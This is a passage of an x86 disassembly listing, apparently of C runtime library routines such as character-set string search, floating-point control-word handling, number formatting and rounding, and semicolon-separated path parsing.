mov dword_453BB0, eax
jns short loc_433E5C
add eax, 5265C00h
dec ecx
mov dword_453BB0, eax
jmp short loc_433E6D
; ---------------------------------------------------------------------------
loc_433E5C: ; CODE XREF: sub_433D3D+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_433E73
sub eax, edx
inc ecx
mov dword_453BB0, eax
loc_433E6D: ; CODE XREF: sub_433D3D+11D�j
mov dword_453BAC, ecx
loc_433E73: ; CODE XREF: sub_433D3D+126�j
mov dword_453BA8, ebx
loc_433E79: ; CODE XREF: sub_433D3D+E5�j
pop esi
pop ebx
pop ebp
retn
sub_433D3D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_433E94: ; CODE XREF: .text:00433E9F�j
mov al, [edx]
or al, al
jz short loc_433EA1
inc edx
bts [esp], eax
jmp short loc_433E94
; ---------------------------------------------------------------------------
loc_433EA1: ; CODE XREF: .text:00433E98�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
nop
loc_433EA8: ; CODE XREF: .text:00433EB4�j
inc ecx
mov al, [esi]
or al, al
jz short loc_433EB6
inc esi
bt [esp], eax
jnb short loc_433EA8
loc_433EB6: ; CODE XREF: .text:00433EAD�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_433ED4: ; CODE XREF: .text:00433EDF�j
mov al, [edx]
or al, al
jz short loc_433EE1
inc edx
bts [esp], eax
jmp short loc_433ED4
; ---------------------------------------------------------------------------
loc_433EE1: ; CODE XREF: .text:00433ED8�j
mov esi, [ebp+8]
loc_433EE4: ; CODE XREF: .text:00433EEF�j
mov al, [esi]
or al, al
jz short loc_433EF4
inc esi
bt [esp], eax
jnb short loc_433EE4
lea eax, [esi-1]
loc_433EF4: ; CODE XREF: .text:00433EE8�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433EFA proc near ; CODE XREF: sub_433F2F+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_433F45
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_433FD7
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_433EFA endp
; =============== S U B R O U T I N E =======================================
sub_433F2F proc near ; CODE XREF: sub_430598+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_433EFA
pop ecx
pop ecx
retn
sub_433F2F endp
; =============== S U B R O U T I N E =======================================
sub_433F45 proc near ; CODE XREF: sub_433EFA+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_433F56
push 10h
pop eax
loc_433F56: ; CODE XREF: sub_433F45+C�j
test bl, 4
jz short loc_433F5D
or al, 8
loc_433F5D: ; CODE XREF: sub_433F45+14�j
test bl, 8
jz short loc_433F64
or al, 4
loc_433F64: ; CODE XREF: sub_433F45+1B�j
test bl, 10h
jz short loc_433F6B
or al, 2
loc_433F6B: ; CODE XREF: sub_433F45+22�j
test bl, 20h
jz short loc_433F72
or al, 1
loc_433F72: ; CODE XREF: sub_433F45+29�j
test bl, 2
jz short loc_433F7C
or eax, 80000h
loc_433F7C: ; CODE XREF: sub_433F45+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_433FB4
cmp edx, 400h
jz short loc_433FB1
cmp edx, 800h
jz short loc_433FAD
cmp edx, esi
jnz short loc_433FB4
or eax, edi
jmp short loc_433FB4
; ---------------------------------------------------------------------------
loc_433FAD: ; CODE XREF: sub_433F45+5E�j
or eax, ebp
jmp short loc_433FB4
; ---------------------------------------------------------------------------
loc_433FB1: ; CODE XREF: sub_433F45+56�j
or ah, 1
loc_433FB4: ; CODE XREF: sub_433F45+4E�j
; sub_433F45+62�j ...
and ecx, edi
pop esi
jz short loc_433FC4
cmp ecx, ebp
jnz short loc_433FC9
or eax, 10000h
jmp short loc_433FC9
; ---------------------------------------------------------------------------
loc_433FC4: ; CODE XREF: sub_433F45+72�j
or eax, 20000h
loc_433FC9: ; CODE XREF: sub_433F45+76�j
; sub_433F45+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_433FD6
or eax, 40000h
locret_433FD6: ; CODE XREF: sub_433F45+8A�j
retn
sub_433F45 endp
; =============== S U B R O U T I N E =======================================
sub_433FD7 proc near ; CODE XREF: sub_433EFA+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_433FE7
push 1
pop eax
loc_433FE7: ; CODE XREF: sub_433FD7+B�j
test bl, 8
jz short loc_433FEE
or al, 4
loc_433FEE: ; CODE XREF: sub_433FD7+13�j
test bl, 4
jz short loc_433FF5
or al, 8
loc_433FF5: ; CODE XREF: sub_433FD7+1A�j
test bl, 2
jz short loc_433FFC
or al, 10h
loc_433FFC: ; CODE XREF: sub_433FD7+21�j
test bl, 1
jz short loc_434003
or al, 20h
loc_434003: ; CODE XREF: sub_433FD7+28�j
test ebx, 80000h
jz short loc_43400D
or al, 2
loc_43400D: ; CODE XREF: sub_433FD7+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_43403A
cmp ecx, 100h
jz short loc_434037
cmp ecx, esi
jz short loc_434032
cmp ecx, edx
jnz short loc_43403A
or ah, 0Ch
jmp short loc_43403A
; ---------------------------------------------------------------------------
loc_434032: ; CODE XREF: sub_433FD7+50�j
or ah, 8
jmp short loc_43403A
; ---------------------------------------------------------------------------
loc_434037: ; CODE XREF: sub_433FD7+4C�j
or ah, 4
loc_43403A: ; CODE XREF: sub_433FD7+44�j
; sub_433FD7+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_434050
cmp ecx, 10000h
jnz short loc_434052
or eax, esi
jmp short loc_434052
; ---------------------------------------------------------------------------
loc_434050: ; CODE XREF: sub_433FD7+6B�j
or eax, edx
loc_434052: ; CODE XREF: sub_433FD7+73�j
; sub_433FD7+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_43405F
or ah, 10h
locret_43405F: ; CODE XREF: sub_433FD7+83�j
retn
sub_433FD7 endp
; =============== S U B R O U T I N E =======================================
sub_434060 proc near ; CODE XREF: sub_4340FF+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_4340A5
inc esi
cmp esi, 3
jge short loc_4340A0
lea eax, [eax+esi*4]
loc_434092: ; CODE XREF: sub_434060+3E�j
cmp dword ptr [eax], 0
jnz short loc_4340A5
inc esi
add eax, 4
cmp esi, 3
jl short loc_434092
loc_4340A0: ; CODE XREF: sub_434060+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4340A5: ; CODE XREF: sub_434060+27�j
; sub_434060+35�j
xor eax, eax
pop esi
retn
sub_434060 endp
; =============== S U B R O U T I N E =======================================
sub_4340A9 proc near ; CODE XREF: sub_4340FF+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_435110
add esp, 0Ch
dec esi
js short loc_4340FB
lea edi, [ebx+esi*4]
loc_4340E2: ; CODE XREF: sub_4340A9+50�j
test eax, eax
jz short loc_4340FB
push edi
push 1
push dword ptr [edi]
call sub_435110
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_4340E2
loc_4340FB: ; CODE XREF: sub_4340A9+34�j
; sub_4340A9+3B�j
pop edi
pop esi
pop ebx
retn
sub_4340A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4340FF proc near ; CODE XREF: sub_43425A+81�p
; sub_43425A+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_434163
inc ebx
push ebx
push [ebp+arg_0]
call sub_434060
pop ecx
test eax, eax
pop ecx
jnz short loc_434160
push edi
push [ebp+arg_0]
call sub_4340A9
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_434160: ; CODE XREF: sub_4340FF+51�j
mov eax, [ebp+arg_4]
loc_434163: ; CODE XREF: sub_4340FF+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_434183
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_434183: ; CODE XREF: sub_4340FF+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4340FF endp
; =============== S U B R O U T I N E =======================================
sub_43418B proc near ; CODE XREF: sub_43425A+75�p
; sub_43425A+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_434199: ; CODE XREF: sub_43418B+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_434199
pop esi
retn
sub_43418B endp
; =============== S U B R O U T I N E =======================================
sub_4341A6 proc near ; CODE XREF: sub_43425A+5F�p
; sub_43425A+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_4341A6 endp
; =============== S U B R O U T I N E =======================================
sub_4341B2 proc near ; CODE XREF: sub_43425A+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_4341B8: ; CODE XREF: sub_4341B2+12�j
cmp dword ptr [eax], 0
jnz short loc_4341CA
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_4341B8
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4341CA: ; CODE XREF: sub_4341B2+9�j
xor eax, eax
retn
sub_4341B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4341CD proc near ; CODE XREF: sub_43425A+C0�p
; sub_43425A+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_434203: ; CODE XREF: sub_4341CD+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_434203
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_434235: ; CODE XREF: sub_4341CD+86�j
cmp ebx, edi
jl short loc_434248
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_43424F
; ---------------------------------------------------------------------------
loc_434248: ; CODE XREF: sub_4341CD+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_43424F: ; CODE XREF: sub_4341CD+79�j
dec ebx
sub ecx, 4
jns short loc_434235
pop edi
pop esi
pop ebx
leave
retn
sub_4341CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43425A proc near ; CODE XREF: sub_4343C6+D�p
; sub_4343DC+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_4342C7
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_4341B2
test eax, eax
pop ecx
jnz loc_434386
lea eax, [ebp+var_C]
push eax
call sub_4341A6
pop ecx
loc_4342BF: ; CODE XREF: sub_43425A+E4�j
push 2
loc_4342C1: ; CODE XREF: sub_43425A+110�j
pop eax
jmp loc_434388
; ---------------------------------------------------------------------------
loc_4342C7: ; CODE XREF: sub_43425A+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_43418B
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4340FF
add esp, 10h
test eax, eax
jz short loc_4342E8
inc ebx
loc_4342E8: ; CODE XREF: sub_43425A+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_434300
lea eax, [ebp+var_C]
push eax
call sub_4341A6
pop ecx
jmp short loc_43433C
; ---------------------------------------------------------------------------
loc_434300: ; CODE XREF: sub_43425A+98�j
cmp ebx, eax
jg short loc_434343
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_43418B
lea eax, [ebp+var_C]
push esi
push eax
call sub_4341CD
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4340FF
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_4341CD
add esp, 20h
loc_43433C: ; CODE XREF: sub_43425A+A4�j
xor esi, esi
jmp loc_4342BF
; ---------------------------------------------------------------------------
loc_434343: ; CODE XREF: sub_43425A+A8�j
cmp ebx, [edi]
jl short loc_43436F
lea eax, [ebp+var_C]
push eax
call sub_4341A6
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_4341CD
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_4342C1
; ---------------------------------------------------------------------------
loc_43436F: ; CODE XREF: sub_43425A+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_4341CD
pop ecx
pop ecx
loc_434386: ; CODE XREF: sub_43425A+55�j
xor eax, eax
loc_434388: ; CODE XREF: sub_43425A+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_4343B7
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_4343C1
; ---------------------------------------------------------------------------
loc_4343B7: ; CODE XREF: sub_43425A+14E�j
cmp edi, 20h
jnz short loc_4343C1
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_4343C1: ; CODE XREF: sub_43425A+15B�j
; sub_43425A+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_43425A endp
; =============== S U B R O U T I N E =======================================
sub_4343C6 proc near ; CODE XREF: sub_4343F2+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_453C20
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_43425A
add esp, 0Ch
retn
sub_4343C6 endp
; =============== S U B R O U T I N E =======================================
sub_4343DC proc near ; CODE XREF: sub_43441F+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_453C38
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_43425A
add esp, 0Ch
retn
sub_4343DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4343F2 proc near ; CODE XREF: sub_4306D1+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4352B1
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4343C6
add esp, 24h
leave
retn
sub_4343F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43441F proc near ; CODE XREF: sub_4306D1+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4352B1
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4343DC
add esp, 24h
leave
retn
sub_43441F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43444C proc near ; CODE XREF: sub_43070F+41�p
; sub_430832+38�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_434489
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_43446F: ; CODE XREF: sub_43444C+38�j
mov dl, [ecx]
test dl, dl
jz short loc_43447B
movsx edx, dl
inc ecx
jmp short loc_43447E
; ---------------------------------------------------------------------------
loc_43447B: ; CODE XREF: sub_43444C+27�j
push 30h
pop edx
loc_43447E: ; CODE XREF: sub_43444C+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_43446F
mov edx, [ebp+arg_8]
loc_434489: ; CODE XREF: sub_43444C+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_4344A2
cmp byte ptr [ecx], 35h
jl short loc_4344A2
loc_434495: ; CODE XREF: sub_43444C+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_4344A0
mov byte ptr [eax], 30h
jmp short loc_434495
; ---------------------------------------------------------------------------
loc_4344A0: ; CODE XREF: sub_43444C+4D�j
inc byte ptr [eax]
loc_4344A2: ; CODE XREF: sub_43444C+42�j
; sub_43444C+47�j
cmp byte ptr [esi], 31h
jnz short loc_4344AC
inc dword ptr [edx+4]
jmp short loc_4344BE
; ---------------------------------------------------------------------------
loc_4344AC: ; CODE XREF: sub_43444C+59�j
push edi
call sub_4292D0
inc eax
push eax
push edi
push esi
call sub_42B9C0
add esp, 10h
loc_4344BE: ; CODE XREF: sub_43444C+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43444C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4344C3 proc near ; CODE XREF: sub_43070F+19�p
; sub_430832+19�p ...
var_28 = word ptr -28h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_43451F
pop ecx
lea eax, [ebp+var_28]
pop ecx
lea esi, [ebp+var_C]
push eax
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_435782
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_26]
mov [esi], eax
movsx eax, [ebp+var_28]
mov [esi+4], eax
lea eax, [ebp+var_24]
push eax
push edi
call sub_42A500
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
pop edi
pop esi
leave
retn
sub_4344C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43451F proc near ; CODE XREF: sub_4344C3+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_43456D
cmp ebx, edi
jz short loc_434566
lea edi, [ecx+3C00h]
jmp short loc_43458E
; ---------------------------------------------------------------------------
loc_434566: ; CODE XREF: sub_43451F+3D�j
mov edi, 7FFFh
jmp short loc_43458E
; ---------------------------------------------------------------------------
loc_43456D: ; CODE XREF: sub_43451F+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_434585
cmp edx, ebx
jnz short loc_434585
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_4345D0
; ---------------------------------------------------------------------------
loc_434585: ; CODE XREF: sub_43451F+52�j
; sub_43451F+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_43458E: ; CODE XREF: sub_43451F+45�j
; sub_43451F+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_4345A6: ; CODE XREF: sub_43451F+A6�j
test ecx, esi
jnz short loc_4345C7
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_4345A6
; ---------------------------------------------------------------------------
loc_4345C7: ; CODE XREF: sub_43451F+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_4345D0: ; CODE XREF: sub_43451F+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_43451F endp
; ---------------------------------------------------------------------------
push 2
call sub_42C5AC
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4345DE proc near ; CODE XREF: sub_430EF3+AC�p
; sub_431058+10�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_676C8C, esi
jnz short loc_4345FB
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42AF90
pop ecx
pop ecx
jmp short loc_43464D
; ---------------------------------------------------------------------------
loc_4345FB: ; CODE XREF: sub_4345DE+C�j
push edi
push 19h
call sub_42DA1F
pop ecx
mov ecx, [ebp+arg_0]
loc_434607: ; CODE XREF: sub_4345DE+62�j
mov dl, [ecx]
movzx eax, dl
movzx edi, al
test byte_676DA1[edi], 4
jz short loc_434636
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_434632
movzx edi, dl
shl eax, 8
or eax, edi
cmp [ebp+arg_4], eax
jnz short loc_43463D
lea esi, [ecx-1]
jmp short loc_43463D
; ---------------------------------------------------------------------------
loc_434632: ; CODE XREF: sub_4345DE+40�j
test esi, esi
jmp short loc_434639
; ---------------------------------------------------------------------------
loc_434636: ; CODE XREF: sub_4345DE+38�j
cmp [ebp+arg_4], eax
loc_434639: ; CODE XREF: sub_4345DE+56�j
jnz short loc_43463D
mov esi, ecx
loc_43463D: ; CODE XREF: sub_4345DE+4D�j
; sub_4345DE+52�j ...
inc ecx
test dl, dl
jnz short loc_434607
push 19h
call sub_42DA80
pop ecx
mov eax, esi
pop edi
loc_43464D: ; CODE XREF: sub_4345DE+1B�j
pop esi
pop ebp
retn
sub_4345DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434650 proc near ; CODE XREF: sub_430EF3:loc_430F6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
loc_434656: ; CODE XREF: sub_434650+C�j
cmp byte ptr [ecx], 3Bh
jnz short loc_43465E
inc ecx
jmp short loc_434656
; ---------------------------------------------------------------------------
loc_43465E: ; CODE XREF: sub_434650+9�j
dec [ebp+arg_8]
push esi
mov eax, ecx
jz short loc_4346B3
mov dl, [ecx]
mov esi, [ebp+arg_4]
test dl, dl
jz short loc_4346A7
loc_43466F: ; CODE XREF: sub_434650+55�j
cmp dl, 3Bh
jz short loc_4346A7
cmp dl, 22h
jz short loc_434684
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_4346AF
jmp short loc_4346A1
; ---------------------------------------------------------------------------
loc_434684: ; CODE XREF: sub_434650+27�j
inc ecx
loc_434685: ; CODE XREF: sub_434650+49�j
mov dl, [ecx]
test dl, dl
jz short loc_43469B
cmp dl, 22h
jz short loc_43469B
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_4346AF
jmp short loc_434685
; ---------------------------------------------------------------------------
loc_43469B: ; CODE XREF: sub_434650+39�j
; sub_434650+3E�j
cmp byte ptr [ecx], 0
jz short loc_4346A1
inc ecx
loc_4346A1: ; CODE XREF: sub_434650+32�j
; sub_434650+4E�j
mov dl, [ecx]
test dl, dl
jnz short loc_43466F
loc_4346A7: ; CODE XREF: sub_434650+1D�j
; sub_434650+22�j ...
cmp byte ptr [ecx], 3Bh
jnz short loc_4346B6
inc ecx
jmp short loc_4346A7
; ---------------------------------------------------------------------------
loc_4346AF: ; CODE XREF: sub_434650+30�j
; sub_434650+47�j
mov eax, ecx
jmp short loc_4346B6
; ---------------------------------------------------------------------------
loc_4346B3: ; CODE XREF: sub_434650+14�j
mov esi, [ebp+arg_4]
loc_4346B6: ; CODE XREF: sub_434650+5A�j
; sub_434650+61�j
and byte ptr [esi], 0
sub eax, ecx
neg eax
sbb eax, eax
pop esi
and eax, ecx
pop ebp
retn
sub_434650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4346C4 proc near ; CODE XREF: sub_430EF3+3A�p
; sub_430EF3+114�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_676C8C, 0
push ebx
push esi
jnz short loc_4346E1
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B0D0
pop ecx
pop ecx
jmp short loc_434757
; ---------------------------------------------------------------------------
loc_4346E1: ; CODE XREF: sub_4346C4+C�j
push 19h
call sub_42DA1F
mov esi, [ebp+arg_0]
pop ecx
loc_4346EC: ; CODE XREF: sub_4346C4+60�j
movzx bx, byte ptr [esi]
test bx, bx
jz short loc_43473F
movzx eax, bl
test byte_676DA1[eax], 4
jz short loc_43471B
mov al, [esi+1]
inc esi
test al, al
jz short loc_434726
movzx ecx, bx
movzx eax, al
shl ecx, 8
or ecx, eax
cmp [ebp+arg_4], ecx
jz short loc_434732
jmp short loc_434723
; ---------------------------------------------------------------------------
loc_43471B: ; CODE XREF: sub_4346C4+3B�j
movzx eax, bx
cmp [ebp+arg_4], eax
jz short loc_43473F
loc_434723: ; CODE XREF: sub_4346C4+55�j
inc esi
jmp short loc_4346EC
; ---------------------------------------------------------------------------
loc_434726: ; CODE XREF: sub_4346C4+43�j
push 19h
call sub_42DA80
pop ecx
xor eax, eax
jmp short loc_434757
; ---------------------------------------------------------------------------
